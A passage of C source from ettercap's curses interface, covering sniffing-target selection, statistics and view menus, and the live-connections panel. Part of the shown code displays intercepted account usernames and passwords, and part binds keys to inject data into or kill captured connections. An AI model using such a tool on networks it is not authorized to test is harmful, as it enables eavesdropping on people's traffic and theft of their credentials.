"p", curses_select_protocol}, {"Reverse matching", 0, tag_reverse, toggle_reverse}, {"-", 0, "", NULL}, {"Wipe targets", 'W', "W", wipe_targets}, {NULL, 0, NULL, NULL}, }; /*******************************************/ static void toggle_reverse(void) { if (EC_GBL_OPTIONS->reversed) { tag_reverse[0] = ' '; EC_GBL_OPTIONS->reversed = 0; } else { tag_reverse[0] = '*'; EC_GBL_OPTIONS->reversed = 1; } } /* * wipe the targets struct setting both T1 and T2 to ANY/ANY/ANY */ static void wipe_targets(void) { DEBUG_MSG("wipe_targets"); reset_display_filter(EC_GBL_TARGET1); reset_display_filter(EC_GBL_TARGET2); /* display the message */ curses_message("TARGETS were reset to ANY/ANY/ANY"); /* if the 'current targets' window is displayed, refresh it */ if (wdg_comp) curses_current_targets(); } /* * display the protocol dialog */ static void curses_select_protocol(void) { DEBUG_MSG("curses_select_protocol"); /* this will contain 'all', 'tcp' or 'udp' */ if (!EC_GBL_OPTIONS->proto) { SAFE_CALLOC(EC_GBL_OPTIONS->proto, 4, sizeof(char)); strncpy(EC_GBL_OPTIONS->proto, "all", 4); } curses_input("Protocol :", EC_GBL_OPTIONS->proto, 3, set_protocol); } static void set_protocol(void) { if (strcasecmp(EC_GBL_OPTIONS->proto, "all") && strcasecmp(EC_GBL_OPTIONS->proto, "tcp") && strcasecmp(EC_GBL_OPTIONS->proto, "udp")) { ui_error("Invalid protocol"); SAFE_FREE(EC_GBL_OPTIONS->proto); } } /* * display the TARGET(s) dialog */ static void curses_select_targets(void) { wdg_t *in; #ifndef TARGET_LEN #define TARGET_LEN 50 #endif DEBUG_MSG("curses_select_target1"); /* make sure we have enough space */ SAFE_REALLOC(EC_GBL_OPTIONS->target1, TARGET_LEN * sizeof(char)); SAFE_REALLOC(EC_GBL_OPTIONS->target2, TARGET_LEN * sizeof(char)); wdg_create_object(&in, WDG_INPUT, WDG_OBJ_WANT_FOCUS | WDG_OBJ_FOCUS_MODAL); wdg_set_color(in, WDG_COLOR_SCREEN, EC_COLOR); wdg_set_color(in, WDG_COLOR_WINDOW, EC_COLOR); wdg_set_color(in, WDG_COLOR_FOCUS, EC_COLOR_FOCUS); wdg_set_color(in, WDG_COLOR_TITLE, EC_COLOR_MENU); wdg_input_size(in, strlen("TARGET1 :") + TARGET_LEN, 4); wdg_input_add(in, 1, 1, "TARGET1 :", EC_GBL_OPTIONS->target1, TARGET_LEN, 1); wdg_input_add(in, 1, 2, "TARGET2 :", EC_GBL_OPTIONS->target2, TARGET_LEN, 1); wdg_input_set_callback(in, set_targets); wdg_draw_object(in); wdg_set_focus(in); } /* * set the targets */ static void set_targets(void) { /* delete the previous filters */ reset_display_filter(EC_GBL_TARGET1); reset_display_filter(EC_GBL_TARGET2); /* free empty filters */ if (!strcmp(EC_GBL_OPTIONS->target1, "")) SAFE_FREE(EC_GBL_OPTIONS->target1); /* free empty filters */ if (!strcmp(EC_GBL_OPTIONS->target2, "")) SAFE_FREE(EC_GBL_OPTIONS->target2); /* compile the filters */ compile_display_filter(); /* if the 'current targets' window is displayed, refresh it */ if (wdg_comp) curses_current_targets(); } /* * display the list of current targets */ static void curses_current_targets(void) { DEBUG_MSG("curses_current_targets"); /* prepare the arrays for the target lists */ curses_create_targets_array(); /* if the object already exist, recreate it */ if (wdg_comp) { wdg_destroy_object(&wdg_comp); } wdg_create_object(&wdg_comp, WDG_COMPOUND, WDG_OBJ_WANT_FOCUS); wdg_set_color(wdg_comp, WDG_COLOR_SCREEN, EC_COLOR); wdg_set_color(wdg_comp, WDG_COLOR_WINDOW, EC_COLOR); wdg_set_color(wdg_comp, WDG_COLOR_FOCUS, EC_COLOR_FOCUS); wdg_set_color(wdg_comp, WDG_COLOR_TITLE, EC_COLOR_TITLE); wdg_set_title(wdg_comp, "Current targets", WDG_ALIGN_LEFT); wdg_set_size(wdg_comp, 1, 2, 98, SYSMSG_WIN_SIZE - 1); wdg_create_object(&wdg_t1, WDG_LIST, 0); wdg_set_title(wdg_t1, "Target 1", WDG_ALIGN_LEFT); wdg_set_color(wdg_t1, WDG_COLOR_TITLE, EC_COLOR_TITLE); wdg_set_color(wdg_t1, WDG_COLOR_FOCUS, EC_COLOR_FOCUS); wdg_set_size(wdg_t1, 2, 3, 49, SYSMSG_WIN_SIZE - 2); wdg_create_object(&wdg_t2, WDG_LIST, 0); wdg_set_title(wdg_t2, "Target 2", WDG_ALIGN_LEFT); wdg_set_color(wdg_t2, WDG_COLOR_TITLE, EC_COLOR_TITLE); wdg_set_color(wdg_t2, WDG_COLOR_FOCUS, EC_COLOR_FOCUS); wdg_set_size(wdg_t2, 50, 3, 97, SYSMSG_WIN_SIZE - 2); /* link the array to the widgets */ wdg_list_set_elements(wdg_t1, wdg_t1_elm); wdg_list_set_elements(wdg_t2, wdg_t2_elm); /* add the callbacks */ wdg_list_add_callback(wdg_t1, 'd', curses_delete_target1); wdg_list_add_callback(wdg_t1, 'a', curses_add_target1); wdg_list_add_callback(wdg_t2, 'd', curses_delete_target2); wdg_list_add_callback(wdg_t2, 'a', curses_add_target2); /* link the widget together within the compound */ wdg_compound_add(wdg_comp, wdg_t1); wdg_compound_add(wdg_comp, wdg_t2); /* add the destroy callback */ wdg_add_destroy_key(wdg_comp, CTRL('Q'), curses_destroy_tsel); wdg_compound_add_callback(wdg_comp, ' ', curses_target_help); wdg_draw_object(wdg_comp); wdg_set_focus(wdg_comp); } static void curses_destroy_tsel(void) { wdg_comp = NULL; } static void curses_target_help(void) { char help[] = "HELP: shortcut list:\n\n" " ARROWS - switch between panels\n" " a - to add a new host\n" " d - to delete an host from the list"; curses_message(help); } /* * create the array for the widget. * erase any previously alloc'd array */ static void curses_create_targets_array(void) { struct ip_list *il; char tmp[MAX_ASCII_ADDR_LEN]; size_t nhosts = 0; DEBUG_MSG("curses_create_targets_array"); /* free the array (if alloc'ed) */ while (wdg_t1_elm && wdg_t1_elm[nhosts].desc != NULL) { SAFE_FREE(wdg_t1_elm[nhosts].desc); nhosts++; } nhosts = 0; while (wdg_t2_elm && wdg_t2_elm[nhosts].desc != NULL) { SAFE_FREE(wdg_t2_elm[nhosts].desc); nhosts++; } SAFE_FREE(wdg_t1_elm); SAFE_FREE(wdg_t2_elm); nhosts = 0; /* XXX - two more loops were added to handle ipv6 targets * since ipv6 targets require a separate list and it is * unreasonable to put both ipv4 and ipv6 at the same list * this code should be completely rewritten. * do it if you have time. * the braindamaged one. */ /* walk TARGET 1 */ LIST_FOREACH(il, &EC_GBL_TARGET1->ips, next) { /* enlarge the array */ SAFE_REALLOC(wdg_t1_elm, (nhosts + 1) * sizeof(struct wdg_list)); /* fill the element */ SAFE_CALLOC(wdg_t1_elm[nhosts].desc, MAX_ASCII_ADDR_LEN + 1, sizeof(char)); /* print the description in the array */ snprintf(wdg_t1_elm[nhosts].desc, MAX_ASCII_ADDR_LEN, "%s", ip_addr_ntoa(&il->ip, tmp)); wdg_t1_elm[nhosts].value = il; nhosts++; } /* same for IPv6 targets */ LIST_FOREACH(il, &EC_GBL_TARGET1->ip6, next) { /* enlarge the array */ SAFE_REALLOC(wdg_t1_elm, (nhosts + 1) * sizeof(struct wdg_list)); /* fill the element */ SAFE_CALLOC(wdg_t1_elm[nhosts].desc, MAX_ASCII_ADDR_LEN + 1, sizeof(char)); /* print the description in the array */ snprintf(wdg_t1_elm[nhosts].desc, MAX_ASCII_ADDR_LEN, "%s", ip_addr_ntoa(&il->ip, tmp)); wdg_t1_elm[nhosts].value = il; nhosts++; } /* null terminate the array */ SAFE_REALLOC(wdg_t1_elm, (nhosts + 1) * sizeof(struct wdg_list)); wdg_t1_elm[nhosts].desc = NULL; wdg_t1_elm[nhosts].value = NULL; nhosts = 0; /* walk TARGET 2 */ LIST_FOREACH(il, &EC_GBL_TARGET2->ips, next) { /* enlarge the array */ SAFE_REALLOC(wdg_t2_elm, (nhosts + 1) * sizeof(struct wdg_list)); /* fill the element */ SAFE_CALLOC(wdg_t2_elm[nhosts].desc, MAX_ASCII_ADDR_LEN + 1, sizeof(char)); /* print the description in the array */ snprintf(wdg_t2_elm[nhosts].desc, MAX_ASCII_ADDR_LEN, "%s", ip_addr_ntoa(&il->ip, tmp)); wdg_t2_elm[nhosts].value = il; nhosts++; } LIST_FOREACH(il, &EC_GBL_TARGET2->ip6, next) { /* enlarge the array */ SAFE_REALLOC(wdg_t2_elm, (nhosts + 1) * sizeof(struct wdg_list)); /* fill the element */ SAFE_CALLOC(wdg_t2_elm[nhosts].desc, MAX_ASCII_ADDR_LEN + 1, sizeof(char)); /* print the description in the array */ snprintf(wdg_t2_elm[nhosts].desc, MAX_ASCII_ADDR_LEN, "%s", ip_addr_ntoa(&il->ip, tmp)); wdg_t2_elm[nhosts].value = il; nhosts++; } /* null terminate the array */ SAFE_REALLOC(wdg_t2_elm, (nhosts + 1) * sizeof(struct wdg_list)); wdg_t2_elm[nhosts].desc = NULL; wdg_t2_elm[nhosts].value = NULL; } /* * delete an host from the target list */ static void curses_delete_target1(void *host) { struct ip_list *il; DEBUG_MSG("curses_delete_target1"); /* cast the parameter */ il = (struct ip_list *)host; /* remove the host from the list */ del_ip_list(&il->ip, EC_GBL_TARGET1); /* redraw the window */ curses_current_targets(); } static void curses_delete_target2(void *host) { struct ip_list *il; DEBUG_MSG("curses_delete_target2"); /* cast the parameter */ il = (struct ip_list *)host; /* remove the host from the list */ del_ip_list(&il->ip, EC_GBL_TARGET2); /* redraw the window */ curses_current_targets(); } /* * display the "add host" dialog */ static void curses_add_target1(void *entry) { /* variable not used */ (void) entry; DEBUG_MSG("curses_add_target1"); curses_input("IP address :", thost, MAX_ASCII_ADDR_LEN, add_target1); } static void curses_add_target2(void *entry) { /* variable not used */ (void) entry; DEBUG_MSG("curses_add_target2"); curses_input("IP address :", thost, MAX_ASCII_ADDR_LEN, add_target2); } static void add_target1(void) { struct ip_addr ip; if(ip_addr_pton(thost, &ip) == -E_INVALID) { curses_message("Invalid ip address"); return; } add_ip_list(&ip, EC_GBL_TARGET1); /* redraw the window */ curses_current_targets(); } static void add_target2(void) { struct ip_addr ip; if(ip_addr_pton(thost, &ip) == -E_INVALID) { curses_message("Invalid ip address"); return; } add_ip_list(&ip, EC_GBL_TARGET2); /* redraw the window */ curses_current_targets(); /* redraw the window */ curses_current_targets(); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/curses/ec_curses_view.c000664 000000 000000 00000016340 13711276346 023055 0ustar00rootroot000000 000000 /* ettercap -- curses GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include /* proto */ static void toggle_resolve(void); static void curses_show_stats(void); static void curses_stop_stats(void); static void refresh_stats(void); static void curses_vis_method(void); static void curses_set_method(void); static void curses_vis_regex(void); static void curses_set_regex(void); static void curses_wifi_key(void); static void curses_set_wifikey(void); extern void curses_show_profiles(void); extern void curses_show_connections(void); /* globals */ static char tag_resolve[] = " "; static wdg_t *wdg_stats; #define VLEN 8 static char vmethod[VLEN]; #define RLEN 50 static char vregex[RLEN]; #define WLEN 70 static char wkey[WLEN]; struct wdg_menu menu_view[] = { {"View", 'V', "", NULL}, {"Connections", 'C', "C", curses_show_connections}, {"Profiles", 'O', "O", curses_show_profiles}, {"Statistics", 's', "s", curses_show_stats}, {"-", 0, "", NULL}, {"Resolve IP addresses", 0, tag_resolve, toggle_resolve}, {"Visualization method...", 'v', "v", curses_vis_method}, {"Visualization regex...", 'R', "R", curses_vis_regex}, {"-", 0, "", NULL}, {"Set the WiFi key...", 'w', "w", curses_wifi_key}, {NULL, 0, NULL, NULL}, }; /*******************************************/ /* * If this option is being activated, * it runs through the current hosts list and triggeres * name resolution in the background. * That way subsequent actions benefits from the filled cache */ static void toggle_resolve(void) { char name[MAX_HOSTNAME_LEN]; struct hosts_list *hl; /* resolution already set */ if (EC_GBL_OPTIONS->resolve) { tag_resolve[0] = ' '; EC_GBL_OPTIONS->resolve = 0; resolv_thread_fini(); return; } DEBUG_MSG("toggle_resolve: activate name resolution"); /* set the option and activate resolution threads */ tag_resolve[0] = '*'; EC_GBL_OPTIONS->resolve = 1; resolv_thread_init(); /* run through the current hosts list and trigger resolution */ LIST_FOREACH(hl, &EC_GBL_HOSTLIST, next) { if (hl->hostname) continue; host_iptoa(&hl->ip, name); } } /* * display the statistics windows */ static void curses_show_stats(void) { DEBUG_MSG("curses_show_stats"); /* if the object already exist, set the focus to it */ if (wdg_stats) { wdg_set_focus(wdg_stats); return; } wdg_create_object(&wdg_stats, WDG_WINDOW, WDG_OBJ_WANT_FOCUS); wdg_set_title(wdg_stats, "Statistics:", WDG_ALIGN_LEFT); wdg_set_size(wdg_stats, 1, 2, 70, 21); wdg_set_color(wdg_stats, WDG_COLOR_SCREEN, EC_COLOR); wdg_set_color(wdg_stats, WDG_COLOR_WINDOW, EC_COLOR); wdg_set_color(wdg_stats, WDG_COLOR_BORDER, EC_COLOR_BORDER); wdg_set_color(wdg_stats, WDG_COLOR_FOCUS, EC_COLOR_FOCUS); wdg_set_color(wdg_stats, WDG_COLOR_TITLE, EC_COLOR_TITLE); wdg_draw_object(wdg_stats); wdg_set_focus(wdg_stats); /* display the stats */ refresh_stats(); /* add the callback on idle to refresh the stats */ wdg_add_idle_callback(refresh_stats); /* add the destroy callback */ wdg_add_destroy_key(wdg_stats, CTRL('Q'), curses_stop_stats); } static void curses_stop_stats(void) { DEBUG_MSG("curses_stop_stats"); wdg_del_idle_callback(refresh_stats); /* the object does not exist anymore */ wdg_stats = NULL; } static void refresh_stats(void) { /* if not focused don't refresh it */ if (!(wdg_stats->flags & WDG_OBJ_FOCUSED)) return; wdg_window_print(wdg_stats, 1, 1, "Received packets : %8lld", EC_GBL_STATS->ps_recv); wdg_window_print(wdg_stats, 1, 2, "Dropped packets : %8lld %.2f %% ", EC_GBL_STATS->ps_drop, (EC_GBL_STATS->ps_recv) ? (float)EC_GBL_STATS->ps_drop * 100 / EC_GBL_STATS->ps_recv : 0 ); wdg_window_print(wdg_stats, 1, 3, "Forwarded packets : %8lld bytes: %8lld ", EC_GBL_STATS->ps_sent, EC_GBL_STATS->bs_sent); wdg_window_print(wdg_stats, 1, 5, "Current queue len : %d/%d ", EC_GBL_STATS->queue_curr, EC_GBL_STATS->queue_max); wdg_window_print(wdg_stats, 1, 6, "Sampling rate : %d ", EC_GBL_CONF->sampling_rate); wdg_window_print(wdg_stats, 1, 8, "Bottom Half received packet : pck: %8lld bytes: %8lld", EC_GBL_STATS->bh.pck_recv, EC_GBL_STATS->bh.pck_size); wdg_window_print(wdg_stats, 1, 9, "Top Half received packet : pck: %8lld bytes: %8lld", EC_GBL_STATS->th.pck_recv, EC_GBL_STATS->th.pck_size); wdg_window_print(wdg_stats, 1, 10, "Interesting packets : %.2f %% ", (EC_GBL_STATS->bh.pck_recv) ? (float)EC_GBL_STATS->th.pck_recv * 100 / EC_GBL_STATS->bh.pck_recv : 0 ); wdg_window_print(wdg_stats, 1, 12, "Bottom Half packet rate : worst: %8d adv: %8d p/s", EC_GBL_STATS->bh.rate_worst, EC_GBL_STATS->bh.rate_adv); wdg_window_print(wdg_stats, 1, 13, "Top Half packet rate : worst: %8d adv: %8d p/s", EC_GBL_STATS->th.rate_worst, EC_GBL_STATS->th.rate_adv); wdg_window_print(wdg_stats, 1, 14, "Bottom Half throughput : worst: %8d adv: %8d b/s", EC_GBL_STATS->bh.thru_worst, EC_GBL_STATS->bh.thru_adv); wdg_window_print(wdg_stats, 1, 15, "Top Half throughput : worst: %8d adv: %8d b/s", EC_GBL_STATS->th.thru_worst, EC_GBL_STATS->th.thru_adv); } /* * change the visualization method */ static void curses_vis_method(void) { DEBUG_MSG("curses_vis_method"); curses_input("Visualization method :", vmethod, VLEN, curses_set_method); } static void curses_set_method(void) { set_format(vmethod); } /* * change the visualization regex */ static void curses_vis_regex(void) { DEBUG_MSG("curses_vis_regex"); curses_input("Visualization regex :", vregex, RLEN, curses_set_regex); } static void curses_set_regex(void) { set_regex(vregex); } /* * change the WiFi key for wifi */ static void curses_wifi_key(void) { DEBUG_MSG("curses_wifi_key"); curses_input("WiFi key :", wkey, WLEN, curses_set_wifikey); } static void curses_set_wifikey(void) { wifi_key_prepare(wkey); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/curses/ec_curses_view_connections.c000664 000000 000000 00000053446 13711276346 025467 0ustar00rootroot000000 000000 /* ettercap -- curses GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include #include #include #include #include #include #include /* proto */ void curses_show_connections(void); static void curses_kill_connections(void); static void refresh_connections(void); static void curses_connection_detail(void *conn); static void curses_connection_data(void *conn); static void curses_connection_data_split(void); static void curses_connection_data_join(void); static void curses_destroy_conndata(void); static void split_print(u_char *text, size_t len, struct ip_addr *L3_src); static void split_print_po(struct packet_object *po); static void join_print(u_char *text, size_t len, struct ip_addr *L3_src); static void join_print_po(struct packet_object *po); static void curses_connection_kill(void *conn); static void curses_connection_purge(void *conn); static void curses_connection_kill_wrapper(void); static void curses_connection_inject(void); static void inject_user(void); static void curses_connection_inject_file(void); static void inject_file(const char *path, char *file); static void curses_connection_help(void *dummy); static void curses_connection_data_help(void); /* globals */ static wdg_t *wdg_connections, *wdg_conn_detail; static wdg_t *wdg_conndata, *wdg_c1, *wdg_c2, *wdg_join; static struct conn_object *curr_conn; /* keep it global, so the memory region is always the same (reallocing it) */ static u_char *dispbuf; static u_char *injectbuf; /*******************************************/ /* * the auto-refreshing list of connections */ void curses_show_connections(void) { DEBUG_MSG("curses_show_connections"); /* if the object already exist, set the focus to it */ if (wdg_connections) { wdg_set_focus(wdg_connections); return; } wdg_create_object(&wdg_connections, WDG_DYNLIST, WDG_OBJ_WANT_FOCUS); wdg_set_title(wdg_connections, "Live connections:", WDG_ALIGN_LEFT); wdg_set_size(wdg_connections, 1, 2, -1, SYSMSG_WIN_SIZE - 1); wdg_set_color(wdg_connections, WDG_COLOR_SCREEN, EC_COLOR); wdg_set_color(wdg_connections, WDG_COLOR_WINDOW, EC_COLOR); wdg_set_color(wdg_connections, WDG_COLOR_BORDER, EC_COLOR_BORDER); wdg_set_color(wdg_connections, WDG_COLOR_FOCUS, EC_COLOR_FOCUS); wdg_set_color(wdg_connections, WDG_COLOR_TITLE, EC_COLOR_TITLE); wdg_draw_object(wdg_connections); wdg_set_focus(wdg_connections); /* set the list print callback */ wdg_dynlist_print_callback(wdg_connections, conntrack_print); /* set the select callback */ wdg_dynlist_select_callback(wdg_connections, curses_connection_data); /* add the callback on idle to refresh the profile list */ wdg_add_idle_callback(refresh_connections); /* add the destroy callback */ wdg_add_destroy_key(wdg_connections, CTRL('Q'), curses_kill_connections); wdg_dynlist_add_callback(wdg_connections, 'd', curses_connection_detail); wdg_dynlist_add_callback(wdg_connections, 'k', curses_connection_kill); wdg_dynlist_add_callback(wdg_connections, 'x', curses_connection_purge); wdg_dynlist_add_callback(wdg_connections, ' ', curses_connection_help); } static void curses_kill_connections(void) { DEBUG_MSG("curses_kill_connections"); wdg_del_idle_callback(refresh_connections); /* the object does not exist anymore */ wdg_connections = NULL; } static void curses_connection_help(void *dummy) { /* variable not used */ (void) dummy; char help[] = "HELP: shortcut list:\n\n" " ENTER - open the data panel in real time\n" " d - show details of the current connection\n" " k - kill the connection\n" " x - purge the connection list"; curses_message(help); } static void refresh_connections(void) { /* if not focused don't refresh it */ if (!(wdg_connections->flags & WDG_OBJ_FOCUSED)) return; wdg_dynlist_refresh(wdg_connections); } /* * details for a connection */ static void curses_connection_detail(void *conn) { struct conn_tail *c = (struct conn_tail *)conn; char tmp[MAX_ASCII_ADDR_LEN]; char *proto = ""; char name[MAX_HOSTNAME_LEN]; unsigned int row = 0; DEBUG_MSG("curses_connection_detail"); /* if the object already exist, set the focus to it */ if (wdg_conn_detail) { wdg_destroy_object(&wdg_conn_detail); wdg_conn_detail = NULL; } wdg_create_object(&wdg_conn_detail, WDG_WINDOW, WDG_OBJ_WANT_FOCUS); wdg_set_title(wdg_conn_detail, "Connection detail:", WDG_ALIGN_LEFT); wdg_set_size(wdg_conn_detail, 1, 2, 75, 23); wdg_set_color(wdg_conn_detail, WDG_COLOR_SCREEN, EC_COLOR); wdg_set_color(wdg_conn_detail, WDG_COLOR_WINDOW, EC_COLOR); wdg_set_color(wdg_conn_detail, WDG_COLOR_BORDER, EC_COLOR_BORDER); wdg_set_color(wdg_conn_detail, WDG_COLOR_FOCUS, EC_COLOR_FOCUS); wdg_set_color(wdg_conn_detail, WDG_COLOR_TITLE, EC_COLOR_TITLE); wdg_draw_object(wdg_conn_detail); wdg_set_focus(wdg_conn_detail); /* add the destroy callback */ wdg_add_destroy_key(wdg_conn_detail, CTRL('Q'), NULL); /* print the information */ wdg_window_print(wdg_conn_detail, 1, ++row, "Source MAC address : %s", mac_addr_ntoa(c->co->L2_addr1, tmp)); wdg_window_print(wdg_conn_detail, 1, ++row, "Destination MAC address : %s", mac_addr_ntoa(c->co->L2_addr2, tmp)); ++row; wdg_window_print(wdg_conn_detail, 1, ++row, "Source IP address : %s", ip_addr_ntoa(&(c->co->L3_addr1), tmp)); if (host_iptoa(&(c->co->L3_addr1), name) == E_SUCCESS) wdg_window_print(wdg_conn_detail, 1, ++row, "Source hostname : %s", name); #ifdef HAVE_GEOIP if (EC_GBL_CONF->geoip_support_enable) wdg_window_print(wdg_conn_detail, 1, ++row, "Source location : %s", geoip_country_by_ip(&c->co->L3_addr1)); #endif wdg_window_print(wdg_conn_detail, 1, ++row, "Destination IP address : %s", ip_addr_ntoa(&(c->co->L3_addr2), tmp)); if (host_iptoa(&(c->co->L3_addr2), name) == E_SUCCESS) wdg_window_print(wdg_conn_detail, 1, ++row, "Destination hostname : %s", name); #ifdef HAVE_GEOIP if (EC_GBL_CONF->geoip_support_enable) wdg_window_print(wdg_conn_detail, 1, ++row, "Destination location : %s", geoip_country_by_ip(&c->co->L3_addr2)); #endif ++row; switch (c->co->L4_proto) { case NL_TYPE_UDP: proto = "UDP"; break; case NL_TYPE_TCP: proto = "TCP"; break; } wdg_window_print(wdg_conn_detail, 1, ++row, "Protocol : %s", proto); wdg_window_print(wdg_conn_detail, 1, ++row, "Source port : %-5d %s", ntohs(c->co->L4_addr1), service_search(c->co->L4_addr1, c->co->L4_proto)); wdg_window_print(wdg_conn_detail, 1, ++row, "Destination port : %-5d %s", ntohs(c->co->L4_addr2), service_search(c->co->L4_addr2, c->co->L4_proto)); row++; wdg_window_print(wdg_conn_detail, 1, ++row, "--> %d <-- %d total: %d ", c->co->tx, c->co->rx, c->co->xferred); row++; if (c->co->DISSECTOR.user) { wdg_window_print(wdg_conn_detail, 1, ++row, "Account : %s / %s", c->co->DISSECTOR.user, c->co->DISSECTOR.pass); if (c->co->DISSECTOR.info) wdg_window_print(wdg_conn_detail, 1, ++row, "Additional Info : %s", c->co->DISSECTOR.info); } } static void curses_connection_data(void *conn) { struct conn_tail *c = (struct conn_tail *)conn; DEBUG_MSG("curses_connection_data"); /* * remove any hook on the open connection. * this is done to prevent a switch of connection * with the panel opened */ if (curr_conn) { conntrack_hook_conn_del(curr_conn, split_print_po); conntrack_hook_conn_del(curr_conn, join_print_po); /* remove the viewing flag */ curr_conn->flags &= ~CONN_VIEWING; } /* set the global variable to pass the parameter to other functions */ curr_conn = c->co; curr_conn->flags |= CONN_VIEWING; /* default is split view */ curses_connection_data_split(); } static void curses_connection_data_help(void) { char help[] = "HELP: shortcut list:\n\n" " ARROWS - switch between panels\n" " j - switch from split to joined view\n" " y - inject characters interactively\n" " Y - inject characters from a file\n" " k - kill the connection"; curses_message(help); } /* * show the content of the connection */ static void curses_connection_data_split(void) { char tmp[MAX_ASCII_ADDR_LEN]; char title[MAX_ASCII_ADDR_LEN+6]; DEBUG_MSG("curses_connection_data_split"); if (wdg_conndata) { struct conn_object *tmp_conn = curr_conn; wdg_destroy_object(&wdg_conndata); curses_destroy_conndata(); curr_conn = tmp_conn; } /* don't timeout this connection */ curr_conn->flags |= CONN_VIEWING; wdg_create_object(&wdg_conndata, WDG_COMPOUND, WDG_OBJ_WANT_FOCUS); wdg_set_color(wdg_conndata, WDG_COLOR_SCREEN, EC_COLOR); wdg_set_color(wdg_conndata, WDG_COLOR_WINDOW, EC_COLOR); wdg_set_color(wdg_conndata, WDG_COLOR_FOCUS, EC_COLOR_FOCUS); wdg_set_color(wdg_conndata, WDG_COLOR_TITLE, EC_COLOR_TITLE); wdg_set_title(wdg_conndata, "Connection data", WDG_ALIGN_LEFT); wdg_set_size(wdg_conndata, 1, 2, -1, SYSMSG_WIN_SIZE - 1); wdg_create_object(&wdg_c1, WDG_SCROLL, 0); snprintf(title, MAX_ASCII_ADDR_LEN+6, "%s:%d", ip_addr_ntoa(&curr_conn->L3_addr1, tmp), ntohs(curr_conn->L4_addr1)); wdg_set_title(wdg_c1, title, WDG_ALIGN_LEFT); wdg_set_color(wdg_c1, WDG_COLOR_TITLE, EC_COLOR_TITLE); wdg_set_color(wdg_c1, WDG_COLOR_FOCUS, EC_COLOR_FOCUS); wdg_set_size(wdg_c1, 2, 3, current_screen.cols / 2, SYSMSG_WIN_SIZE - 2); wdg_create_object(&wdg_c2, WDG_SCROLL, 0); snprintf(title, MAX_ASCII_ADDR_LEN+6, "%s:%d", ip_addr_ntoa(&curr_conn->L3_addr2, tmp), ntohs(curr_conn->L4_addr2)); wdg_set_title(wdg_c2, title, WDG_ALIGN_LEFT); wdg_set_color(wdg_c2, WDG_COLOR_TITLE, EC_COLOR_TITLE); wdg_set_color(wdg_c2, WDG_COLOR_FOCUS, EC_COLOR_FOCUS); wdg_set_size(wdg_c2, current_screen.cols / 2 + 1, 3, -2, SYSMSG_WIN_SIZE - 2); /* set the buffers */ wdg_scroll_set_lines(wdg_c1, EC_GBL_CONF->connection_buffer / (current_screen.cols / 2)); wdg_scroll_set_lines(wdg_c2, EC_GBL_CONF->connection_buffer / (current_screen.cols / 2)); /* link the widget together within the compound */ wdg_compound_add(wdg_conndata, wdg_c1); wdg_compound_add(wdg_conndata, wdg_c2); /* add the destroy callback */ wdg_add_destroy_key(wdg_conndata, CTRL('Q'), curses_destroy_conndata); wdg_compound_add_callback(wdg_conndata, 'j', curses_connection_data_join); wdg_compound_add_callback(wdg_conndata, 'y', curses_connection_inject); wdg_compound_add_callback(wdg_conndata, 'Y', curses_connection_inject_file); wdg_compound_add_callback(wdg_conndata, 'k', curses_connection_kill_wrapper); wdg_compound_add_callback(wdg_conndata, ' ', curses_connection_data_help); wdg_draw_object(wdg_conndata); wdg_set_focus(wdg_conndata); /* print the old data */ connbuf_print(&curr_conn->data, split_print); /* add the hook on the connection to receive data only from it */ conntrack_hook_conn_add(curr_conn, split_print_po); } static void curses_destroy_conndata(void) { conntrack_hook_conn_del(curr_conn, split_print_po); conntrack_hook_conn_del(curr_conn, join_print_po); wdg_conndata = NULL; wdg_c1 = NULL; wdg_c2 = NULL; wdg_join = NULL; curr_conn->flags &= ~CONN_VIEWING; curr_conn = NULL; } static void split_print(u_char *text, size_t len, struct ip_addr *L3_src) { int ret; /* check the regex filter */ if (EC_GBL_OPTIONS->regex && regexec(EC_GBL_OPTIONS->regex, (const char*)text, 0, NULL, 0) != 0) { return; } /* use the global to reuse the same memory region */ SAFE_REALLOC(dispbuf, hex_len(len) * sizeof(u_char) + 1); /* format the data */ ret = EC_GBL_FORMAT(text, len, dispbuf); dispbuf[ret] = 0; if (!ip_addr_cmp(L3_src, &curr_conn->L3_addr1)) wdg_scroll_print(wdg_c1, EC_COLOR, "%s", dispbuf); else wdg_scroll_print(wdg_c2, EC_COLOR, "%s", dispbuf); } static void split_print_po(struct packet_object *po) { int ret; /* check if the object exists */ if (wdg_conndata == NULL || wdg_c1 == NULL || wdg_c2 == NULL) return; /* if not focused don't refresh it */ if (!(wdg_conndata->flags & WDG_OBJ_FOCUSED)) return; /* check the regex filter */ if (EC_GBL_OPTIONS->regex && regexec(EC_GBL_OPTIONS->regex, (const char*)po->DATA.disp_data, 0, NULL, 0) != 0) { return; } /* use the global to reuse the same memory region */ SAFE_REALLOC(dispbuf, hex_len(po->DATA.disp_len) * sizeof(u_char) + 1); /* format the data */ ret = EC_GBL_FORMAT(po->DATA.disp_data, po->DATA.disp_len, dispbuf); dispbuf[ret] = 0; if (!ip_addr_cmp(&po->L3.src, &curr_conn->L3_addr1)) wdg_scroll_print(wdg_c1, EC_COLOR, "%s", dispbuf); else wdg_scroll_print(wdg_c2, EC_COLOR, "%s", dispbuf); } /* * show the data in a joined window */ static void curses_connection_data_join(void) { char src[MAX_ASCII_ADDR_LEN]; char dst[MAX_ASCII_ADDR_LEN]; char title[64]; DEBUG_MSG("curses_connection_data_join"); if (wdg_conndata) { struct conn_object *tmp_conn = curr_conn; wdg_destroy_object(&wdg_conndata); curses_destroy_conndata(); curr_conn = tmp_conn; } /* don't timeout this connection */ 